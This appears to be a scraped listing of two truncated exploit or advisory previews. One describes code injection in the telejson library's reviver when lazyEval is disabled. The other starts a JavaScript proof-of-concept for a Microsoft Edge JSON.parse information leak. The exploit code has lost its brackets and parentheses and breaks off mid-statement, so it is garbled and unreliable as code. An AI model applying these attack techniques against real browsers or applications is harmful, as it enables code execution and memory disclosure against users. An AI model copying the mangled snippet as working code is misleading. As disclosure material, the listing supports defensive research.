Code Injection in storybookjs/telejson

✍️ Description telejson is a library for teleporting rich data to another place. The telejson.reviver which is used to parse string data back to json structure can be abused to execute arbitrary code when the lazyEval option is set to false i.e., disabled. The root cause is the attackers can...

Microsoft Edge - JSON.parse Info Leak

var once = false; var a = 1; function f if!once a = new Array1, 2, 3; this2 = a; once = true; //alert"f " + this; return ; JSON.parse"1, 2, 4, 5", f; var n = new Numbera0; n = n 1; var s = n.toString16; n = new Numbera1; n = n 1; s = s + n.toString16; n.length = 100; n = new Numbera2; n = n 1; s ...